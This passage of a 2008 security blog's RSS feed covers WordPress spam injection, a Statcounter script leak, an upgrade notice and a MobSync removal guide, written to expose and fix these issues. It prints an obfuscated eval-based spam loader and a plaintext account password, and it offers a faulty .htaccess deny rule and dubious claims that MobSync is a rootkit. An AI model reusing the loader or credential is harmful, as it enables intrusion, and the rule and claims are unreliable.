<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a></td>
</tr>
<tr>
<td><small>Feb 20th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.entrepreneur27.org/" class="exturl icn-r1">entrepreneur27.org</a></td>
</tr>
<tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>Feb 24th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="www.latenightpc.com">latenightpc.com</a></td>
</tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>Feb 26th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.communitynext.com" class="exturl icn-r1" title="www.communitynext.com">communitynext.com</a></td>
</tr>
</tbody>
</table>
<h2 class="cb mgt mgb-">Wordpress.net.in GORO Spam Pattern</h2>
<ul class="xoxo exturl pdt">
<li>All the infected sites will stop being index by archive.org few months before the spam started.</li>
<li>From Nov 2007 to Jan 2008 (Right after Google Mass <abbr title="pay-per---post"> P3</abbr> De-rank fever) - The Blackhat Goro Spammer is targeting PR6 &#038; PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)</li>
<li>I categorize this blackhat method as <a href="http://en.wikipedia.org/wiki/Sybil_attack">Sybil Attack</a><br />
<blockquote cite="http://en.wikipedia.org/wiki/Reputation_system"><p class="quote">A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system&#8217;s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.</p>
</blockquote>
<p>- Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) </li>
<li>Goro signatures:
<ol>
<li>html div with id &#8220;goro&#8221;
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt; &lt;a href=&quot;&gt;...&lt;/a&gt; &lt;/div&gt;
</pre>
</li>
<li>javascript function name &#8220;getme()&#8221;
<pre class="smallbox">&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;
</pre>
</li>
<li>Output spam on WordPress wp_footer &#038; wp_head hook</li>
</ol>
</ul>
<h2>Blackhat SEO Spamdexing Google Local Search Index</h2>
<p>The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.</p>
<h3 class="title-">View Spamdexing Google Local Search Image</h3>
<div id="spamdexing-google-local-search" class="dn">
<img src='/wp-content/uploads/2008/01/mattheaton-comeback.png' alt='spamdexing-google-localsearch.png' class="mgb ta-c" width="500" height="800" /></p>
<p class="notice cb mgt">Note: A blackhat at hoqwarts ;)</p>
</div>
<h2 class="cb mgb-">ScreenGrab</h2>
<ul class="xoxo pdt exturl">
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/mattheatoncom-jan-08.png' title='screenshot of mattheaton.com on january 2008' type="image/png" class="icn-">mattheaton.com Jan 28 2008</a> <small>(1009 x 6576 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/levitra-tagging-googlebot.png' title='brainwave-india hacked by goro' type="image/png" class="icn-">brainwave-india.com Jan 28 2008</a> <small>(1016 x 2306 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/localsearch.png' title='Spamdexing Google Localsearch' type="image/png" class="icn-">Google Local Search Jan 28 2008</a> Spamdexing Results</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra.png' title='stc-israel.org.il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (hidden text)</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra-white.png' title='stc-israel.org il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (text reveal)</li>
</ul>
<h2 class="cb mgt mgb">Recent Update</h2>
<ul class="xoxo r">
<li><span class="fw">Feb 1, 2008</span> - we send a letter to <span class="vcard"><a href="mailto:matt@bluehost.com" class="url fn email microformat icn-l">matt@bluehost.com</a></span> regarding this issue. Still waiting for his replies</li>
<li><span class="fw">Feb 3, 2008</span> - The Blackhat Goro Spammer change their target spamhost from <a href="http://www.brainwave-india.com" class="exturl icn-r">http://www.brainwave-india.com</a> <small>(PR6)</small> to <a href="http://www.thinkingphp.org" class="exturl icn-r">http://www.thinkingphp.org</a> <small>(PR6)</small> - <span class="vcard"><a href="http://www.fg-webdesign.de/en/" class="url fn microformat icn-l">Felix Geisend&#246;rfer</a></span>.
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt;&lt;a href=&quot;http://www.thinkingphp.org/?read=796 ... prescription&lt;/a&gt;&lt;/div&gt;&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;</pre>
<p><strong>thinkingphp.org</strong> blog is running on <em>WordPress 2.3.2</em>. We send him email regarding the <strong class="fw-">Goro Spam hijack</strong>.
</li>
<li id="feb8"><span class="fw">Feb 8th 2008</span>, There is no signature of Goro spam (tag with id goro) on Matt&#8217;s blog the blackhat is now using <em>Inline CSS Position Overflow </em> to hide the spams links &darr; redirect to <a href="http://www.zoorender.com" class="exturl icn-r1">zoorender.com</a> <small>(PR6)</small>.
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.zoorender.com/?discount=1776&quot;&gt;buying .. &lt;/div&gt;
</pre>
</li>
<li id="feb13"><span class="fw">Feb 13th 2008</span>, Same methods as above (inline css cloacking) .
<ul>
<li>HTML Code shown to a Regular Browser &rarr; 32,246 characters</li>
<li>HTML Code shown to Google Bot &rarr; 34,646 characters</li>
</ul>
<p>redirect to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a> <small>(PR7)</small>.</p>
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://blog.jensfranke.com/?read=606&quot;&gt;buy generic fi
</pre>
</li>
<li id="feb20"><span class="fw">Feb 20th 2008</span>, CSS Cloacking redirect to <a href="http://http://www.entrepreneur27.org/" class="exturl icn-r1">http://www.entrepreneur27.org/</a> <small>(PR6)</small>.
<pre class="smallbox">
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1591&quot;&gt;bad side effects of viagra&lt;/a&gt;&amp;nbsp;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1592&quot;&gt; ...
&lt;/div&gt;
</pre>
<li id="feb-24-08"><span class="fw">Feb 24th 2008</span>, CSS Cloacking redirect to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="latenightpc.com">http://www.latenightpc.com</a> <small>(PR5)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>mattheaton-com-022408-source.txt</a></small></li>
<li id="feb-26-08"><span class="fw">Feb 26th 2008</span>, CSS Cloacking redirect to <a href="http://www.communitynext.com/" class="exturl icn-r1" title="www.communitynext.com">http://www.communitynext.com/</a> WordPress 2.3.3 <small>(PR6)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>mattheaton-com-022608-source.txt</a></small>
</li>
</ul>
<h2 class="mgt mgb-">Related Posts</h2>
<ul class="xoxo pdt exturl">
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed wordpress.net.in Spam Injection"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a></li>
</ul>
<h2 class="cb mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/d3d3Lm1hdHRoZWF0b24uY29t.curie,80,302" title="Bluehost and Hostmonster CEO Blog">Bluehost &#038; Hostmonster CEO&#8217;s Blog</a></li>
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://en.wikipedia.org/wiki/Spamdexing">Wikipedia &#8594; Spamdexing</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Statcounter Update.sh Vulnerability Fixes</title>
		<link>http://42.kaizeku.com/security/vulnerability/fixes-statscounter-updatesh-vulnerability/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/fixes-statscounter-updatesh-vulnerability/#comments</comments>
		<pubDate>Sun, 27 Jan 2008 13:11:46 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[htaccess]]></category>

		<category><![CDATA[ip2location]]></category>

		<category><![CDATA[shell scripts]]></category>

		<category><![CDATA[Statcounter]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/fixes-statscounter-updatesh-vulnerability/</guid>
		<description><![CDATA[The vulnerability exists in statcounters backup log inside utils directory where the file update.sh reside.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><span class="vcard"><a class="url fn microformat icn-l" href="http://www.gianniamato.it/"><span class="given-name">Gianni</span> <span class="family-name">Amato</span></a></span> found a vulnerability in <a href="http://statcounter.com" rel="nofollow" class="exturl icn-r">statcounter</a> that can expose ip2location database log and account credentials. </p>
<h2>The Vulnerability</h2>
<p>The vulnerability exists in <strong>statcounters backup log</strong> inside utils directory where the file <em>update.sh</em> reside.</p>
<ul>
<li>googlecache: <a href="http://209.85.135.104/search?q=cache:www.sunmarklsa.com/mc1.statcounter.com/utils/update.sh" class="exturl icn-r">*.statcounter.com/utils/update.sh</a></li>
</ul>
<p><span id="more-154"></span><br />
Excerpt from Giani Amot:</p>
<blockquote cite="http://www.gianniamato.it/"><p class="quote">The server where the backup&#8217;s log of the last three days are situated is badly set. The access for all directory by server is free, include &#8220;utils&#8221; directory that contains one script file called &#8220;update.sh&#8221; inside of which are situated the user and password to enter and download the database log from ip2location.com<br />
</blockquote>
<h2>Update.sh</h2>
<pre class="prebox">
cd /home/ip2location

/usr/bin/curl --data 'login=webmaster@statcounter.com&amp;password=kOFr3VTh' 'http://www.ip2location.com/download.aspx?productcode=db6bin' &gt; /home/ip2location/ipdb_current.bin.zip

rm /home/ip2location/ipdb_new.bin

unzip -p /home/ip2location/ipdb_current.bin.zip *.BIN &gt; /home/ip2location/ipdb_new.bin

if [ &quot;$?&quot; -ne &quot;0&quot; ]; then

 echo &quot;Sorry, new ip_db archive isn't valid!&quot;

 exit 1

fi

mv /home/ip2location/ipdb_new.bin /home/ip2location/ipdb.bin

rm /home/ip2location/ipdb_current.bin.zip

/bin/cp /home/ip2location/ipdb.bin /mnt/rd/ipdb.bin
</pre>
<h2>htaccess workaround</h2>
<p>places the following <em>.htaccess</em> code inside statscounter /utils/ directory</p>
<pre class="prebox">
#deny access to any file with *.sh filetypes
&lt;Files ~ &quot;^\.sh&quot;&gt;
 Order allow,deny
 Deny from all
 Satisfy All
&lt;/Files&gt;

#Deny request for *.log &#038; comment files
&lt;Files ~ &quot;^.*\.([Ll][Oo][Gg]|[cC][oO][mM][mM][eE][nN][tT])&quot;&gt;
 Order allow,deny
 Deny from all
 Satisfy All
&lt;/Files&gt;
</pre>
<h2>password protected directories</h2>
<pre class="prebox">
AuthType Basic
AuthName "restricted area"
AuthUserFile /usr/local/etc/.htpasswd-allusers
require valid-user
</pre>
<p class="notice">Note: You will need to change the <span class="fw">AuthUserFile</span> password file location depending on your server configurations.</p>
<h2>External Resources</h2>
<ul>
<li><a class="exturl icn-r" href="http://www.gianniamato.it/2008/01/se-fossi-tu-monitorare-statcountercom.html">Giani Amato &rarr; Se fossi tu a monitorare Statcounter.com?</a></li>
<li><a class="exturl icn-r" href="http://translate.google.com/translate?hl=en&#038;u=http%3A%2F%2Fwww.gianniamato.it%2F2008%2F01%2Fse-fossi-tu-monitorare-statcountercom.html">Giani Amato &rarr; Se fossi tu a monitorare Statcounter.com &raquo; English Translations </a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/fixes-statscounter-updatesh-vulnerability/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Upgrade Wordpress 2.3.2</title>
		<link>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/</link>
		<comments>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/#comments</comments>
		<pubDate>Sun, 30 Dec 2007 11:36:40 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[2.3.2]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/upgrade-wordpress-232/</guid>
		<description><![CDATA[WordPress developer had to release this 'securities' fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade than sorry. ]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I just upgrade today, <a href="http://wordpress.org/download/">WordPress 2.3.2</a>, fixed a <a href="http://trac.wordpress.org/ticket/5487">nasty vulnerability</a>. I haven&#8217;t did any test yet but according to &#8220;<a href="http://blog.kakkoi.net/wordpress/upgrade-wordpress-232/#black-domainer">blackhat domainer</a>&#8221; you can view WordPress Draft Entry via simple URL parameters without log in (un-authorize view).<br />
<span id="more-119"></span><br />
WordPress developer had to release this &#8217;securities&#8217; fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade. </p>
<p>Peter Westwood&#8217;s sum up all wordpress 2.3.2 recent <a href="http://westi.wordpress.com/2007/12/30/wordpress-232-in-detail/">change and update in details</a>. Read it first before you decide to upgrade.</p>
<h2>External Links</h2>
<ul>
<li><a id="black-domainer" class="url" href="http://www.blackhatdomainer.com/how-to-know-today-what-shoemoney-is-going-to-post-tomorrow/" rel="external">How to know today what ShoeMoney is going to post tomorrow</a></li>
<li><a href="http://wordpress.org/development/2007/12/wordpress-232/">Wordpress 2.3.2 Announcements (dev blog)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How To Disabled and Removed Microsoft Windows MobSync - Trojan RootKit</title>
		<link>http://42.kaizeku.com/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/#comments</comments>
		<pubDate>Mon, 24 Dec 2007 20:07:00 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[Malware]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[mobile]]></category>

		<category><![CDATA[mobsync]]></category>

		<category><![CDATA[rootkit]]></category>

		<category><![CDATA[Synchronization Manager]]></category>

		<category><![CDATA[Trojan]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/how-to-disabled-and-removed-microsoft-windows-mobsync-trojan-rootkit/</guid>
		<description><![CDATA[<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/mobsyncexe.png' alt='mobsync.exe'  class="fl"/><strong>MobSync</strong> is a <strong>Microsoft Mobile Synchronization Manager </strong>available in Win 2000 &#38; Windows XP</p>
<p class="cl">Excerpt from <a href="http://support.microsoft.com/kb/314512">Microsoft KB 314512</a> Articles (2002)</p>
<blockquote>
The Windows XP Synchronization Manager helps ensure that the files and folders on your mobile device and your desktop computer stay synchronized. With Synchronization Manager, you can be sure you are always working with the latest copy of your data, online or offline.
</blockquote>

<p>Technically MobSync is  part of Windows Memory Management, its prefetch (type of cache) your External Device Contents (Mobile PC, Windows Embed XPE, PDA,database etc .. ) thus helps speed up the Windows booting process by shortening the time external device  programs takes to start up. </p>

<h2>MobSync Issue</h2>
<p>MobSync is registered to run on logon but the process is hidden on others 'Scans Tools' like Autoruns.exe &#038; Process.exe (SysInternal).</p>
QuickFact:
<ul>
	<li> MobSync.exe can record inputs.</li>
	<li> Its hide itself from monitor applications.</li> 
</ul>
Apparently because of its transparencies nature to hide behind windows systems some hackers decide to reverse engineer this programs as a Trojan Rootkit. [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/mobsyncexe.png' alt='mobsync.exe' class="fl"/><strong>MobSync</strong> is a <strong>Microsoft Mobile Synchronization Manager </strong>available in Win 2000 &amp; Windows XP</p>
<p class="cl">Excerpt from <a href="http://support.microsoft.com/kb/314512">Microsoft KB 314512</a> Articles (2002)</p>
<blockquote><p>
The Windows XP Synchronization Manager helps ensure that the files and folders on your mobile device and your desktop computer stay synchronized. With Synchronization Manager, you can be sure you are always working with the latest copy of your data, online or offline.
</p></blockquote>
<p>Technically MobSync is part of Windows Memory Management, its prefetch (type of cache) your External Device Contents (Mobile PC, Windows Embed XPE, PDA,database etc .. ) thus helps speed up the Windows booting process by shortening the time external device programs takes to start up. </p>
<h2>MobSync Issue</h2>
<p>MobSync is registered to run on logon but the process is hidden on others &#8216;Scans Tools&#8217; like Autoruns.exe &#038; Process.exe (SysInternal).</p>
<p>QuickFact:</p>
<ul>
<li> MobSync.exe can record inputs.</li>
<li> Its hide itself from monitor applications.</li>
</ul>
<p>Apparently because of its transparencies nature to hide behind windows systems some hackers decide to reverse engineer this programs as a Trojan Rootkit.<br />
<span id="more-101"></span></p>
<h2 class="sep">Should I disabled Mobsync?</h2>
<p>If you used windows for surfing and office works you probably wont need this programs <span style="text-decoration:line-through">(crapware)</span> most modern mobile device has a build in Synchronization Manager and doesnt relies on microsoft mobsync (dependencies issue). Its recommended to disabled this programs as it can hide itself from being monitored and doesnt showup on running process lists. </p>
<h2 class="sep">Step by step guide to disabled MobSync from your windows.</h2>
<ol>
<li>
<h3>Disabled System Restore</h3>
<p>You will need to disabled <a href="http://www.microsoft.com/technet/community/newsgroups/faqsrwxp.mspx"> Windows System Restore</a> (Temporary).</li>
<li>
<h3>View hidden system files</h3>
<p>Suspicious files is known to hide itself as Windows System files. The following settings will set all hidden files viewable so we could removed it.</p>
<ul>
<li>Click on Windows Start &rarr; Control Panel &rarr; Folder Options &rarr; View Tab </li>
<li>Turn on the option to show hidden files</li>
</ul>
</li>
<li>
<h3>Clean Temporary Files and Windows Prefetch Files</h3>
<p>This wont harm your system. Removes all files inside the following directory. <span class="b">Remove the contents only not the folders</span>.</p>
<ul>
<li>C:\temp</li>
<li>C:\windows\temp</li>
<li>C:\Documents and Settings\&lt;username&gt;\Local Settings\Temp</li>
<li>C:\windows\prefetch</li>
</ul>
</li>
<li>
<h3>Boot in SafeMode</h3>
<p>Restart your PC in safe mode. Refer <a href="http://support.microsoft.com/kb/315222">KB 31522</a> on How To Boot in Safe Mode.</li>
<li>
<h3>Disabled MobSync Process</h3>
<ol class="nfo">
<li>Click on start &rarr; Run &rarr; <strong>mobsync</strong></li>
<li> Next, Click on <span style="font-weight:700">Setup</span> buttons</li>
<li> On &#8220;Synchronizations Settings&#8221; Windows <span style="font-weight:700">Logon/Logoff</span> tab un-check all the following options:</p>
<p><tt>Automatically Synchronize the following items:</tt></p>
<ul>
<li>When I log on to my computer</li>
<li>When I log off to my computer</li>
</ul>
</li>
<li>While still in &#8220;Synchronizations Settings&#8221; Windows select the next tab label <span style="font-weight:700">&#8220;on Idle&#8221;</span> un-check the following items:
<ul>
<li>Synchronize the selected items while my computer is idle</li>
</ul>
</li>
</ol>
</li>
<li>
<h3>Removed from system registry</h3>
<p>If you arent familiar with registry you may skip this part. Most normal startup programs can be found at the following registry path.</p>
<ul>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\Run
<li>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce</li>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices</li>
<li>HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</li>
<li>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</li>
<li>HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce</li>
</ul>
<p>In Windows XP all loaded &#8220;startup programs&#8221; (start menu/startup items) can be found at <tt>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg</tt></p>
<p><strong>Mobsync registry</strong> <tt>HKLM\Software\Microsoft\Windows\CurrentVersion\syncmgr</tt>
</li>
</ol>
<h2 class="sep">Note on using Rootkit Scanner.</h2>
<ul>
<li><a href="http://aumha.org">James A. Eshelman</a> <a href="http://aumha.org/downloads/hijackthis.exe"> HijackThis</a></li>
<li><a href="http://forum.sysinternals.com/">SysInternal</a> <a href="http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx">RootkitRevealer</a></li>
<li><a href="http://www.f-secure.com">F-secure</a> <a href="http://www.f-secure.com/blacklight/">Blacklight</a></li>
</ul>
<p>Most advance Rootkit has a self mechanism to shutdown the system if any of this programs is identify in the memory. If you had this programs installed its advice to rename the programs first. </p>
<ul>
<li> RootKitRevealer.exe &rarr; RKV.exe</li>
<li>HijackThis &rarr; hjct.exe</li>
</ul>
<h3>How to validate if the running programs is Tempered</h3>
<p>Get <a href="http://www.wmsoftware.com/download.aspx?product=chktrust">Certificate Verification Tool</a> ( WM Software Corp) and verify the programs signature or you could also run Microsoft sigverif.exe (c:\windows\SIGVERIF.TXT) to verify digital signature. </p>
<p>Caveat: Most Rookit is &#8220;padded/mugged&#8221; with unix controls character so its not readable by Windows (ANSI).</p>
<h3>Setupapi.log entries</h3>
<p>Setupapi.log can be found inside <tt>c:\windows\setupapi.log</tt> You need to enabled logging in verbose mode to get proper setup log.<br />
<tt>HKLM\Software\Microsoft\Windows\CurrentVersion\SetupLogLevel</tt></p>
<p>Insert DWORD value 0000FFFF to enabled verbose mode logging</p>
<p>Insert DWORD value 0 to disabled it</p>
<p>Tempered MobSync.exe &#038; similar windows networks files.</p>
<pre class="prebox">
An unsigned or incorrectly signed file
(c:\windows\msdownld.tmp\as03b1e1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll to
C:\WINDOWS\SYSTEM\msidle.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe to
C:\WINDOWS\SYSTEM\mobsync.exe.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll to
C:\WINDOWS\SYSTEM\mobsync.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll to
C:\WINDOWS\SYSTEM\sens.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll to
C:\WINDOWS\SYSTEM\sensapi.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll to
C:\WINDOWS\SYSTEM\senscfg.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll to
C:\WINDOWS\SYSTEM\es.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll to
C:\WINDOWS\SYSTEM\esshared.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll to
C:\WINDOWS\SYSTEM\estier2.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd to
C:\WINDOWS\SYSTEM\sage.vxd.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll to
C:\WINDOWS\SYSTEM\esenu.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf to
C:\WINDOWS\INF\mobilepk.inf.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp to
C:\WINDOWS\help\chnscsvr.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat to
C:\WINDOWS\SYSTEM\sfp\ie\mobilepk.cat.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp to
C:\WINDOWS\help\mobsync.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp) was installed. Error
0xe000022f: The third-party INF does not contain digital signature information.
</pre>
<h2>Summary</h2>
